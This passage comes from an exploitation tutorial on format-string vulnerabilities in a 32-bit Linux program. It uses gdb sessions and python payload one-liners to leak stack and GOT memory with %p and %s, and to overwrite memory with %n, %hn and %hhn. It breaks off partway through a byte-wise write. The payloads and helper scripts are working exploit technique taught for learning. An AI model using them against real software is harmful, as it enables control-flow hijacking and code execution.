0024| 0xffffd568 (" RUV\327UUVT\332\377\367\001")
0028| 0xffffd56c --> 0x565555d7 (<main+26>: add ebx,0x1a29)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x56555642 in main ()
The format string is at 0xffffd584. The output below shows how its bytes are laid out on the stack:
gdb-peda$ x/20w $esp
0xffffd550: 0xffffd584 0x00000001 0x88888888 0xffffffff
0xffffd560: 0xffffd57a 0xffffd584 0x56555220 0x565555d7
0xffffd570: 0xf7ffda54 0x00000001 0x424135d0 0x00004443
0xffffd580: 0x00000000 0x41414141 0x2e70252e 0x252e7025
0xffffd590: 0x70252e70 0x2e70252e 0x252e7025 0x70252e70
gdb-peda$ x/20wb 0xffffd584
0xffffd584: 0x41 0x41 0x41 0x41 0x2e 0x25 0x70 0x2e
0xffffd58c: 0x25 0x70 0x2e 0x25 0x70 0x2e 0x25 0x70
0xffffd594: 0x2e 0x25 0x70 0x2e
gdb-peda$ python print('\x2e\x25\x70')
.%p
Here is the result of running the program:
gdb-peda$ c
Continuing.
AAAA.0x1.0x88888888.0xffffffff.0xffffd57a.0xffffd584.0x56555220.0x565555d7.0xf7ffda54.0x1.0x424135d0.0x4443.(nil).0x41414141.0x2e70252e.0x252e7025.0x70252e70.0x2e70252e.0x252e7025.0x70252e70.0x2e70252e
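Counting the position of the marker in such output by eye is error-prone. A Python 3 sketch that does the counting is shown here; find_marker_offset is a hypothetical helper, and the sample string is the output above truncated just after the marker:

```python
def find_marker_offset(output, marker=0x41414141, sep="."):
    """Return the 1-based index of `marker` among the leaked values."""
    fields = output.strip().split(sep)[1:]   # drop the echoed "AAAA"
    for index, field in enumerate(fields, start=1):
        value = 0 if field == "(nil)" else int(field, 16)
        if value == marker:
            return index
    return None

output = ("AAAA.0x1.0x88888888.0xffffffff.0xffffd57a.0xffffd584."
          "0x56555220.0x565555d7.0xf7ffda54.0x1.0x424135d0.0x4443."
          "(nil).0x41414141.0x2e70252e")
print(find_marker_offset(output))  # 13
```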
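0x41414141 is the 13th value printed, so %13$s reads the contents at 0x41414141. That is probably not a valid address, of course. Next we replace 0x41414141 with a valid address we are interested in, such as 0xffffd57a, the address of the string ABCD: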
$ python2 -c 'print("\x7a\xd5\xff\xff"+".%13$s")' > text
$ gdb -q a.out
Reading symbols from a.out...(no debugging symbols found)...done.
gdb-peda$ b printf
Breakpoint 1 at 0x8048350
gdb-peda$ r < text
[----------------------------------registers-----------------------------------]
EAX: 0xffffd584 --> 0xffffd57a ("ABCD")
EBX: 0x804a000 --> 0x8049f14 --> 0x1
ECX: 0x1
EDX: 0xf7f9883c --> 0x0
ESI: 0xf7f96e68 --> 0x1bad90
EDI: 0x0
EBP: 0xffffd618 --> 0x0
ESP: 0xffffd54c --> 0x8048520 (<main+138>: add esp,0x20)
EIP: 0xf7e27c20 (<printf>: call 0xf7f06d17 <__x86.get_pc_thunk.ax>)
EFLAGS: 0x296 (carry PARITY ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0xf7e27c1b <fprintf+27>: ret
0xf7e27c1c: xchg ax,ax
0xf7e27c1e: xchg ax,ax
=> 0xf7e27c20 <printf>: call 0xf7f06d17 <__x86.get_pc_thunk.ax>
0xf7e27c25 <printf+5>: add eax,0x16f243
0xf7e27c2a <printf+10>: sub esp,0xc
0xf7e27c2d <printf+13>: mov eax,DWORD PTR [eax+0x124]
0xf7e27c33 <printf+19>: lea edx,[esp+0x14]
No argument
[------------------------------------stack-------------------------------------]
0000| 0xffffd54c --> 0x8048520 (<main+138>: add esp,0x20)
0004| 0xffffd550 --> 0xffffd584 --> 0xffffd57a ("ABCD")
0008| 0xffffd554 --> 0x1
0012| 0xffffd558 --> 0x88888888
0016| 0xffffd55c --> 0xffffffff
0020| 0xffffd560 --> 0xffffd57a ("ABCD")
0024| 0xffffd564 --> 0xffffd584 --> 0xffffd57a ("ABCD")
0028| 0xffffd568 --> 0x80481fc --> 0x38 ('8')
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Breakpoint 1, 0xf7e27c20 in printf () from /usr/lib32/libc.so.6
gdb-peda$ x/20w $esp
0xffffd54c: 0x08048520 0xffffd584 0x00000001 0x88888888
0xffffd55c: 0xffffffff 0xffffd57a 0xffffd584 0x080481fc
0xffffd56c: 0x080484b0 0xf7ffda54 0x00000001 0x424135d0
0xffffd57c: 0x00004443 0x00000000 0xffffd57a 0x3331252e
0xffffd58c: 0x00007324 0xffffd5ca 0x00000001 0x000000c2
gdb-peda$ x/s 0xffffd57a
0xffffd57a: "ABCD"
gdb-peda$ c
Continuing.
z���.ABCD
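The python2 one-liner above relies on Python 2 strings being raw bytes. In Python 3 an equivalent payload can be built with struct; this is a sketch in which read_payload is a hypothetical helper and the target is assumed to be 32-bit little-endian:

```python
import struct

def read_payload(address, offset):
    """Address (little-endian, 4 bytes) followed by a positional %s."""
    return struct.pack("<I", address) + b".%" + str(offset).encode() + b"$s"

payload = read_payload(0xFFFFD57A, 13)
print(payload)  # b'z\xd5\xff\xff.%13$s'
```

To feed it to the program, write the bytes in binary mode (for example through sys.stdout.buffer.write), since print() in Python 3 would re-encode the high bytes as text.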
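Reading back a string we already know is not very useful by itself. The common use is to pass in the GOT address of some function in the program and obtain that function's virtual address. From the function's relative position within libc, we can then compute the address of the function we need (such as system()), as shown below.
First, look at the relocation table: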
$ readelf -r a.out
Relocation section '.rel.dyn' at offset 0x2e8 contains 1 entries:
Offset Info Type Sym.Value Sym. Name
08049ffc 00000206 R_386_GLOB_DAT 00000000 __gmon_start__
Relocation section '.rel.plt' at offset 0x2f0 contains 4 entries:
Offset Info Type Sym.Value Sym. Name
0804a00c 00000107 R_386_JUMP_SLOT 00000000 printf@GLIBC_2.0
0804a010 00000307 R_386_JUMP_SLOT 00000000 __libc_start_main@GLIBC_2.0
0804a014 00000407 R_386_JUMP_SLOT 00000000 putchar@GLIBC_2.0
0804a018 00000507 R_386_JUMP_SLOT 00000000 __isoc99_scanf@GLIBC_2.7
.rel.plt offers four functions to choose from. In principle any of them should do, but in practice some cause problems. The results below are for printf, __libc_start_main, putchar, and __isoc99_scanf respectively:
$ python2 -c 'print("\x0c\xa0\x04\x08"+".%p"*20)' | ./a.out
.0x1.0x88888888.0xffffffff.0xffe22cfa.0xffe22d04.0x80481fc.0x80484b0.0xf77afa54.0x1.0x424155d0.0x4443.(nil).0x2e0804a0.0x252e7025.0x70252e70.0x2e70252e.0x252e7025.0x70252e70.0x2e70252e.0x252e7025
$ python2 -c 'print("\x10\xa0\x04\x08"+".%p"*20)' | ./a.out
.0x1.0x88888888.0xffffffff.0xffd439ba.0xffd439c4.0x80481fc.0x80484b0.0xf77b6a54.0x1.0x4241c5d0.0x4443.(nil).0x804a010.0x2e70252e.0x252e7025.0x70252e70.0x2e70252e.0x252e7025.0x70252e70.0x2e70252e
$ python2 -c 'print("\x14\xa0\x04\x08"+".%p"*20)' | ./a.out
.0x1.0x88888888.0xffffffff.0xffcc17aa.0xffcc17b4.0x80481fc.0x80484b0.0xf7746a54.0x1.0x4241c5d0.0x4443.(nil).0x804a014.0x2e70252e.0x252e7025.0x70252e70.0x2e70252e.0x252e7025.0x70252e70.0x2e70252e
$ python2 -c 'print("\x18\xa0\x04\x08"+".%p"*20)' | ./a.out
▒.0x1.0x88888888.0xffffffff.0xffcb99aa.0xffcb99b4.0x80481fc.0x80484b0.0xf775ca54.0x1.0x424125d0.0x4443.(nil).0x804a018.0x2e70252e.0x252e7025.0x70252e70.0x2e70252e.0x252e7025.0x70252e70.0x2e70252e
Look closely and you will notice that the first result (printf) is wrong. We entered \x0c\xa0\x04\x08 (0x0804a00c), yet position 13 shows 0x2e0804a0. Where did \x0c go? A look at the ASCII table:
Oct Dec Hex Char
──────────────────────────────────────
014 12 0C FF '\f' (form feed)
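It was dropped: the program reads its input with scanf("%s"), which skips leading whitespace and stops at the next whitespace character, and form feed counts as whitespace. The same happens to the other whitespace bytes: \x09 ('\t'), \x0a ('\n'), \x0b ('\v'), \x0d ('\r'), and \x20 (space). An address containing any of these bytes breaks the later steps, so here we pick the last entry (__isoc99_scanf).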
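Checking candidate addresses for such bytes before building a payload avoids this surprise. A Python 3 sketch is given here under the assumption that the input is read with scanf("%s") in the default C locale; whitespace_bytes is a hypothetical helper and the addresses come from the relocation table above:

```python
import struct

# Bytes that C's isspace() accepts in the default locale. scanf("%s")
# skips them at the start of input and stops at them anywhere else.
WHITESPACE = b" \t\n\v\f\r"

def whitespace_bytes(address):
    """Return the bytes of a packed 32-bit address that scanf would eat."""
    packed = struct.pack("<I", address)
    return [byte for byte in packed if byte in WHITESPACE]

got_entries = {
    "printf": 0x0804A00C,
    "__libc_start_main": 0x0804A010,
    "putchar": 0x0804A014,
    "__isoc99_scanf": 0x0804A018,
}
for name, address in got_entries.items():
    status = "unusable" if whitespace_bytes(address) else "ok"
    print(f"{name:<18} {address:#010x} {status}")
```

Only the printf entry is flagged, because its low byte 0x0c is a form feed.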
$ python2 -c 'print("\x18\xa0\x04\x08"+"%13$s")' > text
$ gdb -q a.out
Reading symbols from a.out...(no debugging symbols found)...done.
gdb-peda$ b printf
Breakpoint 1 at 0x8048350
gdb-peda$ r < text
[----------------------------------registers-----------------------------------]
EAX: 0xffffd584 --> 0x804a018 --> 0xf7e3a790 (<__isoc99_scanf>: push ebp)
EBX: 0x804a000 --> 0x8049f14 --> 0x1
ECX: 0x1
EDX: 0xf7f9883c --> 0x0
ESI: 0xf7f96e68 --> 0x1bad90
EDI: 0x0
EBP: 0xffffd618 --> 0x0
ESP: 0xffffd54c --> 0x8048520 (<main+138>: add esp,0x20)
EIP: 0xf7e27c20 (<printf>: call 0xf7f06d17 <__x86.get_pc_thunk.ax>)
EFLAGS: 0x296 (carry PARITY ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0xf7e27c1b <fprintf+27>: ret
0xf7e27c1c: xchg ax,ax
0xf7e27c1e: xchg ax,ax
=> 0xf7e27c20 <printf>: call 0xf7f06d17 <__x86.get_pc_thunk.ax>
0xf7e27c25 <printf+5>: add eax,0x16f243
0xf7e27c2a <printf+10>: sub esp,0xc
0xf7e27c2d <printf+13>: mov eax,DWORD PTR [eax+0x124]
0xf7e27c33 <printf+19>: lea edx,[esp+0x14]
No argument
[------------------------------------stack-------------------------------------]
0000| 0xffffd54c --> 0x8048520 (<main+138>: add esp,0x20)
0004| 0xffffd550 --> 0xffffd584 --> 0x804a018 --> 0xf7e3a790 (<__isoc99_scanf>: push ebp)
0008| 0xffffd554 --> 0x1
0012| 0xffffd558 --> 0x88888888
0016| 0xffffd55c --> 0xffffffff
0020| 0xffffd560 --> 0xffffd57a ("ABCD")
0024| 0xffffd564 --> 0xffffd584 --> 0x804a018 --> 0xf7e3a790 (<__isoc99_scanf>: push ebp)
0028| 0xffffd568 --> 0x80481fc --> 0x38 ('8')
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Breakpoint 1, 0xf7e27c20 in printf () from /usr/lib32/libc.so.6
gdb-peda$ x/20w $esp
0xffffd54c: 0x08048520 0xffffd584 0x00000001 0x88888888
0xffffd55c: 0xffffffff 0xffffd57a 0xffffd584 0x080481fc
0xffffd56c: 0x080484b0 0xf7ffda54 0x00000001 0x424135d0
0xffffd57c: 0x00004443 0x00000000 0x0804a018 0x24333125
0xffffd58c: 0x00f00073 0xffffd5ca 0x00000001 0x000000c2
gdb-peda$ x/w 0x804a018
0x804a018: 0xf7e3a790
gdb-peda$ c
Continuing.
▒����
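Although x/w shows that the virtual address of __isoc99_scanf is 0xf7e3a790, the content at 0x804a018 is itself a pointer, so %13$s prints its raw bytes rather than a readable address. Later material shows how to use pwntools to recover the address in the proper form and put it to further use.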
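Even without pwntools, the raw bytes can be decoded with Python 3's struct module. In this sketch the captured bytes are reconstructed from the gdb session above, and SCANF_OFFSET and SYSTEM_OFFSET are made-up placeholder values; real offsets have to be read from the libc actually used by the target.

```python
import struct

# What the program prints for the payload above: the 4 address bytes
# are echoed first, then %13$s dumps the bytes stored at 0x804a018.
program_output = b"\x18\xa0\x04\x08" + b"\x90\xa7\xe3\xf7"

# Skip the echoed address and decode the next 4 bytes as little-endian.
scanf_addr = struct.unpack("<I", program_output[4:8])[0]
print(hex(scanf_addr))  # 0xf7e3a790

# Hypothetical offsets inside libc, for illustration only.
SCANF_OFFSET = 0x5C790
SYSTEM_OFFSET = 0x3A940
libc_base = scanf_addr - SCANF_OFFSET
system_addr = libc_base + SYSTEM_OFFSET
print(hex(libc_base), hex(system_addr))
```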
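Note that it is not always possible to line the argument pointer up with the start of the format string using 4-byte steps (such as AAAA) alone. Sometimes a prefix of one, two, or three characters must be added before the format string so that the rest falls on 4-byte boundaries.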
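Overwriting Stack Contents
Now that we can read the stack and arbitrary memory, we go one step further and hijack the program's control flow by modifying the stack and memory. The %n conversion specifier stores the number of characters written so far to the stream or buffer into the integer whose address is given by the corresponding argument.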
#include<stdio.h>
void main() {
int i;
char str[] = "hello";
printf("%s %n\n", str, &i);
printf("%d\n", i);
}
$ ./a.out
hello
6
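i is set to 6 because six characters (hello plus one space) had been written before the conversion specifier was reached. Without a length modifier, %n writes a value of type int.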
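Usually the value we want to write is the address of some shellcode, which tends to be a very large number. We therefore control the number of characters written with a conversion specification that has an explicit width or precision: a decimal integer in the specification gives the minimum number of characters to output. If the value is longer than that, it is printed in full; otherwise it is padded with spaces or zeros (for zero padding, put a . or a 0 before the number). For example: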
#include<stdio.h>
void main() {
int i;
printf("%10u%n\n", 1, &i);
printf("%d\n", i);
printf("%.50u%n\n", 1, &i);
printf("%d\n", i);
printf("%0100u%n\n", 1, &i);
printf("%d\n", i);
}
$ ./a.out
1
10
00000000000000000000000000000000000000000000000001
50
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001
100
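The value stored by %n always equals the length of the text produced before it, so the counts in both programs above can be predicted offline. A Python 3 sketch using the same format strings (Python accepts %u as an alias of %d):

```python
# Text each printf() call above has produced by the time it reaches %n.
cases = ["%s " % "hello", "%10u" % 1, "%.50u" % 1, "%0100u" % 1]

# len() of that text is the value %n would store.
for text in cases:
    print(len(text))
```

This prints 6, 10, 50 and 100, matching the values of i in the two runs.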
With that in place, we can write the address 0x8048000 (134512640 in decimal) to memory:
printf("%0134512640d%n\n", 1, &i);
$ ./a.out
...
0x8048000
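Back to our original program. We try to change arg2 to a value of our choice (say 0x00000020, decimal 32). gdb shows that arg2 is at 0xffffd538, so we build the format string \x38\xd5\xff\xff%08x%08x%012d%13$n. Here \x38\xd5\xff\xff is the address of arg2 and takes 4 bytes; %08x%08x prints two 8-character hexadecimal numbers, 16 bytes in total; and %012d prints 12 bytes. The three parts add up to 4+16+12=32 bytes, so arg2 is set to 0x00000020. The last part, %13$n, is the most important. As before, it refers to the 13th argument of the format string, which is the slot (0xffffd564) where 0xffffd538 was written; printf() uses the address in that slot to find the location to overwrite: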
$ python2 -c 'print("\x38\xd5\xff\xff%08x%08x%012d%13$n")' > text
$ gdb -q a.out
Reading symbols from a.out...(no debugging symbols found)...done.
gdb-peda$ b printf
Breakpoint 1 at 0x8048350
gdb-peda$ r < text
[----------------------------------registers-----------------------------------]
EAX: 0xffffd564 --> 0xffffd538 --> 0x88888888
EBX: 0x804a000 --> 0x8049f14 --> 0x1
ECX: 0x1
EDX: 0xf7f9883c --> 0x0
ESI: 0xf7f96e68 --> 0x1bad90
EDI: 0x0
EBP: 0xffffd5f8 --> 0x0
ESP: 0xffffd52c --> 0x8048520 (<main+138>: add esp,0x20)
EIP: 0xf7e27c20 (<printf>: call 0xf7f06d17 <__x86.get_pc_thunk.ax>)
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0xf7e27c1b <fprintf+27>: ret
0xf7e27c1c: xchg ax,ax
0xf7e27c1e: xchg ax,ax
=> 0xf7e27c20 <printf>: call 0xf7f06d17 <__x86.get_pc_thunk.ax>
0xf7e27c25 <printf+5>: add eax,0x16f243
0xf7e27c2a <printf+10>: sub esp,0xc
0xf7e27c2d <printf+13>: mov eax,DWORD PTR [eax+0x124]
0xf7e27c33 <printf+19>: lea edx,[esp+0x14]
No argument
[------------------------------------stack-------------------------------------]
0000| 0xffffd52c --> 0x8048520 (<main+138>: add esp,0x20)
0004| 0xffffd530 --> 0xffffd564 --> 0xffffd538 --> 0x88888888
0008| 0xffffd534 --> 0x1
0012| 0xffffd538 --> 0x88888888
0016| 0xffffd53c --> 0xffffffff
0020| 0xffffd540 --> 0xffffd55a ("ABCD")
0024| 0xffffd544 --> 0xffffd564 --> 0xffffd538 --> 0x88888888
0028| 0xffffd548 --> 0x80481fc --> 0x38 ('8')
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Breakpoint 1, 0xf7e27c20 in printf () from /usr/lib32/libc.so.6
gdb-peda$ x/20x $esp
0xffffd52c: 0x08048520 0xffffd564 0x00000001 0x88888888
0xffffd53c: 0xffffffff 0xffffd55a 0xffffd564 0x080481fc
0xffffd54c: 0x080484b0 0xf7ffda54 0x00000001 0x424135d0
0xffffd55c: 0x00004443 0x00000000 0xffffd538 0x78383025
0xffffd56c: 0x78383025 0x32313025 0x33312564 0x00006e24
gdb-peda$ finish
Run till exit from #0 0xf7e27c20 in printf () from /usr/lib32/libc.so.6
[----------------------------------registers-----------------------------------]
EAX: 0x20 (' ')
EBX: 0x804a000 --> 0x8049f14 --> 0x1
ECX: 0x0
EDX: 0xf7f98830 --> 0x0
ESI: 0xf7f96e68 --> 0x1bad90
EDI: 0x0
EBP: 0xffffd5f8 --> 0x0
ESP: 0xffffd530 --> 0xffffd564 --> 0xffffd538 --> 0x20 (' ')
EIP: 0x8048520 (<main+138>: add esp,0x20)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x8048514 <main+126>: lea eax,[ebp-0x94]
0x804851a <main+132>: push eax
0x804851b <main+133>: call 0x8048350 <printf@plt>
=> 0x8048520 <main+138>: add esp,0x20
0x8048523 <main+141>: sub esp,0xc
0x8048526 <main+144>: push 0xa
0x8048528 <main+146>: call 0x8048370 <putchar@plt>
0x804852d <main+151>: add esp,0x10
[------------------------------------stack-------------------------------------]
0000| 0xffffd530 --> 0xffffd564 --> 0xffffd538 --> 0x20 (' ')
0004| 0xffffd534 --> 0x1
0008| 0xffffd538 --> 0x20 (' ')
0012| 0xffffd53c --> 0xffffffff
0016| 0xffffd540 --> 0xffffd55a ("ABCD")
0020| 0xffffd544 --> 0xffffd564 --> 0xffffd538 --> 0x20 (' ')
0024| 0xffffd548 --> 0x80481fc --> 0x38 ('8')
0028| 0xffffd54c --> 0x80484b0 (<main+26>: add ebx,0x1b50)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x08048520 in main ()
gdb-peda$ x/20x $esp
0xffffd530: 0xffffd564 0x00000001 0x00000020 0xffffffff
0xffffd540: 0xffffd55a 0xffffd564 0x080481fc 0x080484b0
0xffffd550: 0xf7ffda54 0x00000001 0x424135d0 0x00004443
0xffffd560: 0x00000000 0xffffd538 0x78383025 0x78383025
0xffffd570: 0x32313025 0x33312564 0x00006e24 0xf7e70240
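Comparing the output before and after the call to printf(): printf first handles %13$n by reading the value 0xffffd538 stored at 0xffffd564, then goes to address 0xffffd538 and overwrites its value 0x88888888 with 0x00000020, giving arg2=0x00000020.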
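The byte counting behind such a payload can be automated. The Python 3 sketch below is a variant rather than the exact payload used above: it pads with a single %Nc instead of %08x%08x%012d, and write_payload is a hypothetical helper that assumes a 32-bit little-endian target with the address landing at argument index offset.

```python
import struct

def write_payload(target, value, offset):
    """Leading 4-byte address, padding, then a positional %n.

    Assumes value >= 5: 4 address bytes plus at least 1 padding
    character produced by %c.
    """
    if value < 5:
        raise ValueError("value too small for a leading-address payload")
    padding = value - 4                     # characters still to emit
    return (struct.pack("<I", target)
            + f"%{padding}c%{offset}$n".encode())

# Character count of the payload used above: 4 + 8 + 8 + 12.
emitted = 4 + len("%08x" % 1) + len("%08x" % 0x88888888) + len("%012d" % -1)
print(emitted)  # 32

print(write_payload(0xFFFFD538, 0x20, 13))
# b'8\xd5\xff\xff%28c%13$n'
```

Both forms emit 32 characters before %13$n, so both store 0x20 at the target address.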
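Overwriting Memory at an Arbitrary Address
Some readers may have spotted a problem: with the method above, the smallest value we can write is 4, because the address alone takes 4 bytes. How do we write a value smaller than 4? Integer overflow is one option, but in practice it almost never works. Think again: in the earlier inputs the address always came before the rest of the format string. Is that really necessary? Could the address go somewhere later? Let's try the format string "AA%15$nA"+"\x38\xd5\xff\xff". The leading AA takes two bytes, so the value written to the address is 2. Next comes %15$n, which takes 5 bytes; it is %15$n rather than %13$n because the address now sits later, in the 15th argument of the format string. A single A follows, taking one byte. The first part therefore takes 2+5+1=8 bytes, exactly the width of two arguments. Keeping this part a whole number of 4-byte slots (8 bytes here) is essential, because otherwise the address would not line up with an argument. Finally comes the address to overwrite, \x38\xd5\xff\xff. The full gdb session follows.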
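The alignment arithmetic for a trailing address can be sketched in Python 3. Here trailing_address_payload is a hypothetical helper; it assumes a 32-bit little-endian target, literal A characters as filler, and that buffer_offset is the argument index of the first 4 bytes of the format string (13 in this walkthrough).

```python
import struct

def trailing_address_payload(target, value, buffer_offset):
    """Emit `value` filler bytes, a positional %n, then the address."""
    index = buffer_offset
    while True:
        head = b"A" * value + f"%{index}$n".encode()
        pad = -len(head) % 4                 # round up to a 4-byte slot
        slot = buffer_offset + (len(head) + pad) // 4
        if slot == index:                    # guess matches the layout
            return head + b"A" * pad + struct.pack("<I", target)
        index = slot                         # retry with the real slot

print(trailing_address_payload(0xFFFFD538, 2, 13))
# b'AA%15$nA8\xd5\xff\xff'
```

The padding goes after %n, so it is printed but does not change the value that gets stored.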
$ python2 -c 'print("AA%15$nA"+"\x38\xd5\xff\xff")' > text
$ gdb -q a.out
Reading symbols from a.out...(no debugging symbols found)...done.
gdb-peda$ b printf
Breakpoint 1 at 0x8048350
gdb-peda$ r < text
[----------------------------------registers-----------------------------------]
EAX: 0xffffd564 ("AA%15$nA8\325\377\377")
EBX: 0x804a000 --> 0x8049f14 --> 0x1
ECX: 0x1
EDX: 0xf7f9883c --> 0x0
ESI: 0xf7f96e68 --> 0x1bad90
EDI: 0x0
EBP: 0xffffd5f8 --> 0x0
ESP: 0xffffd52c --> 0x8048520 (<main+138>: add esp,0x20)
EIP: 0xf7e27c20 (<printf>: call 0xf7f06d17 <__x86.get_pc_thunk.ax>)
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0xf7e27c1b <fprintf+27>: ret
0xf7e27c1c: xchg ax,ax
0xf7e27c1e: xchg ax,ax
=> 0xf7e27c20 <printf>: call 0xf7f06d17 <__x86.get_pc_thunk.ax>
0xf7e27c25 <printf+5>: add eax,0x16f243
0xf7e27c2a <printf+10>: sub esp,0xc
0xf7e27c2d <printf+13>: mov eax,DWORD PTR [eax+0x124]
0xf7e27c33 <printf+19>: lea edx,[esp+0x14]
No argument
[------------------------------------stack-------------------------------------]
0000| 0xffffd52c --> 0x8048520 (<main+138>: add esp,0x20)
0004| 0xffffd530 --> 0xffffd564 ("AA%15$nA8\325\377\377")
0008| 0xffffd534 --> 0x1
0012| 0xffffd538 --> 0x88888888
0016| 0xffffd53c --> 0xffffffff
0020| 0xffffd540 --> 0xffffd55a ("ABCD")
0024| 0xffffd544 --> 0xffffd564 ("AA%15$nA8\325\377\377")
0028| 0xffffd548 --> 0x80481fc --> 0x38 ('8')
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Breakpoint 1, 0xf7e27c20 in printf () from /usr/lib32/libc.so.6
gdb-peda$ x/20x $esp
0xffffd52c: 0x08048520 0xffffd564 0x00000001 0x88888888
0xffffd53c: 0xffffffff 0xffffd55a 0xffffd564 0x080481fc
0xffffd54c: 0x080484b0 0xf7ffda54 0x00000001 0x424135d0
0xffffd55c: 0x00004443 0x00000000 0x31254141 0x416e2435
0xffffd56c: 0xffffd538 0xffffd500 0x00000001 0x000000c2
gdb-peda$ finish
Run till exit from #0 0xf7e27c20 in printf () from /usr/lib32/libc.so.6
[----------------------------------registers-----------------------------------]
EAX: 0x7
EBX: 0x804a000 --> 0x8049f14 --> 0x1
ECX: 0x0
EDX: 0xf7f98830 --> 0x0
ESI: 0xf7f96e68 --> 0x1bad90
EDI: 0x0
EBP: 0xffffd5f8 --> 0x0
ESP: 0xffffd530 --> 0xffffd564 ("AA%15$nA8\325\377\377")
EIP: 0x8048520 (<main+138>: add esp,0x20)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x8048514 <main+126>: lea eax,[ebp-0x94]
0x804851a <main+132>: push eax
0x804851b <main+133>: call 0x8048350 <printf@plt>
=> 0x8048520 <main+138>: add esp,0x20
0x8048523 <main+141>: sub esp,0xc
0x8048526 <main+144>: push 0xa
0x8048528 <main+146>: call 0x8048370 <putchar@plt>
0x804852d <main+151>: add esp,0x10
[------------------------------------stack-------------------------------------]
0000| 0xffffd530 --> 0xffffd564 ("AA%15$nA8\325\377\377")
0004| 0xffffd534 --> 0x1
0008| 0xffffd538 --> 0x2
0012| 0xffffd53c --> 0xffffffff
0016| 0xffffd540 --> 0xffffd55a ("ABCD")
0020| 0xffffd544 --> 0xffffd564 ("AA%15$nA8\325\377\377")
0024| 0xffffd548 --> 0x80481fc --> 0x38 ('8')
0028| 0xffffd54c --> 0x80484b0 (<main+26>: add ebx,0x1b50)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x08048520 in main ()
gdb-peda$ x/20x $esp
0xffffd530: 0xffffd564 0x00000001 0x00000002 0xffffffff
0xffffd540: 0xffffd55a 0xffffd564 0x080481fc 0x080484b0
0xffffd550: 0xf7ffda54 0x00000001 0x424135d0 0x00004443
0xffffd560: 0x00000000 0x31254141 0x416e2435 0xffffd538
0xffffd570: 0xffffd500 0x00000001 0x000000c2 0xf7e70240
Comparing the output before and after printf() runs, we can see that arg2 has successfully been set to 0x00000002.
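That covers writing values smaller than 4; now for large values. The earlier method tells us we can assign a value simply by supplying it (for example an address) in decimal, but a full-width write like that takes up too much space and often overwrites other important addresses, causing errors. In fact, we can use length modifiers to change the size of the value that is written:
char c;
short s;
int i;
long l;
long long ll;
printf("%s %hhn\n", str, &c); // writes 1 byte
printf("%s %hn\n", str, &s); // writes 2 bytes
printf("%s %n\n", str, &i); // writes 4 bytes
printf("%s %ln\n", str, &l); // writes sizeof(long): 4 bytes on x86-32, 8 bytes on x86-64 Linux
printf("%s %lln\n", str, &ll); // writes 8 bytes
Let's try it: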
$ python2 -c 'print("A%15$hhn"+"\x38\xd5\xff\xff")' > text
0xffffd530: 0xffffd564 0x00000001 0x88888801 0xffffffff
$ python2 -c 'print("A%15$hnA"+"\x38\xd5\xff\xff")' > text
0xffffd530: 0xffffd564 0x00000001 0x88880001 0xffffffff
$ python2 -c 'print("A%15$nAA"+"\x38\xd5\xff\xff")' > text
0xffffd530: 0xffffd564 0x00000001 0x00000001 0xffffffff
This lets us overwrite memory one byte at a time, which saves a great deal of space. Here we try to write 0x12345678 to address 0xffffd538. First, use AAAABBBBCCCCDDDD as input:
gdb-peda$ r
AAAABBBBCCCCDDDD
[----------------------------------registers-----------------------------------]
EAX: 0xffffd564 ("AAAABBBBCCCCDDDD")
EBX: 0x804a000 --> 0x8049f14 --> 0x1
ECX: 0x1
EDX: 0xf7f9883c --> 0x0
ESI: 0xf7f96e68 --> 0x1bad90
EDI: 0x0
EBP: 0xffffd5f8 --> 0x0
ESP: 0xffffd52c --> 0x8048520 (<main+138>: add esp,0x20)
EIP: 0xf7e27c20 (<printf>: call 0xf7f06d17 <__x86.get_pc_thunk.ax>)
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0xf7e27c1b <fprintf+27>: ret
0xf7e27c1c: xchg ax,ax
0xf7e27c1e: xchg ax,ax
=> 0xf7e27c20 <printf>: call 0xf7f06d17 <__x86.get_pc_thunk.ax>
0xf7e27c25 <printf+5>: add eax,0x16f243
0xf7e27c2a <printf+10>: sub esp,0xc
0xf7e27c2d <printf+13>: mov eax,DWORD PTR [eax+0x124]
0xf7e27c33 <printf+19>: lea edx,[esp+0x14]
No argument
[------------------------------------stack-------------------------------------]
0000| 0xffffd52c --> 0x8048520 (<main+138>: add esp,0x20)
0004| 0xffffd530 --> 0xffffd564 ("AAAABBBBCCCCDDDD")
0008| 0xffffd534 --> 0x1
0012| 0xffffd538 --> 0x88888888
0016| 0xffffd53c --> 0xffffffff
0020| 0xffffd540 --> 0xffffd55a ("ABCD")
0024| 0xffffd544 --> 0xffffd564 ("AAAABBBBCCCCDDDD")
0028| 0xffffd548 --> 0x80481fc --> 0x38 ('8')
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Breakpoint 1, 0xf7e27c20 in printf () from /usr/lib32/libc.so.6
gdb-peda$ x/20x $esp
0xffffd52c: 0x08048520 0xffffd564 0x00000001 0x88888888
0xffffd53c: 0xffffffff 0xffffd55a 0xffffd564 0x080481fc
0xffffd54c: 0x080484b0 0xf7ffda54 0x00000001 0x424135d0
0xffffd55c: 0x00004443 0x00000000 0x41414141 0x42424242
0xffffd56c: 0x43434343 0x44444444 0x00000000 0x000000c2
gdb-peda$ x/4wb 0xffffd538
0xffffd538: 0x88 0x88 0x88 0x88
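Because we want to overwrite byte by byte, we need 4 stack slots that hold the pointers, 4 target addresses, and 4 values. They correspond as follows (little endian):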
0xffffd564 -> 0x41414141 (0xffffd538) -> \x78
0xffffd568 -> 0x42424242 (0xffffd539) -> \x56
